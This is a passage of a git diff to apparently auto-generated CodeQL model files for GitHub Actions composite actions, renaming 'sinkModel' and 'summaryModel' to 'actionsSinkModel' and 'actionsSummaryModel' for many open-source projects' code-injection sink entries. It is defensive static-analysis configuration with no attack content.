b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 12017671b4e9..8d1bbce631fc 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index e3028cc1bb35..3c5f85a6e79e 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index ab112bb5ec00..01a552361ecf 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 0d8ae4e102e4..ab2e86ce8681 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 44156ddd6709..8d6dd73bfd91 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 693d456e4a59..a20cbb1e24da 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 5e3dffbb7f5e..62785bef86bf 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 5d782529f7f6..9c10a54abc71 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index f7f845ac28f7..4145ec195690 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index a58f033cc38d..5b63c9fec069 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index aefece4bebda..f21389b08b02 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 5cbcfc018791..1a6f42c25f66 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 0712838a737f..ea48b84310cb 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 5ab14ba453bd..4e953d695f82 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 564961fc6007..32040ef84eac 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index 8876184a0c1a..b258ea1ce2da 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 7a389e89e53c..c0a51345ae6f 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index ca23beb6e04d..f362cd1f72b7 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6dd..35474e6c68f9 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b340..ce961ee6a75b 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c3312262..9ad4bb306662 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c10..5fca46427e00 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d2..9f0fecbe10b9 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a013..cadf01dbff1e 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df670..ec4fc1da053c 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd1158..e6530a19d972 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97af..0bae4e91cde0 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a40..0acb53ba1d3a 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368e..f1b755e796b5 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039b..7d1733d647ac 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e83761..4bf33c9a343d 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff306..9ca004a7c155 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a7..fc3870d89a8e 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d94..1d621562771e 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a2..f09b364127e6 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a3..56e7b8142316 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0d..9f953b32ab17 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd4..257b77bc2c34 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e0..49f2f86907f9 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b65..1e33c5e540aa 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b43..cfbf15549c48 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae41..24730af3d77a 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed1603..6be5abd09dd7 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c4..145b6f0d0e3e 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb8..c8b05bfd904b 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7e..04c218a76c1b 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de4..5447d4b7e2ed 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aeff..825ce27511d7 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59ed..8f3e49c9768a 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ 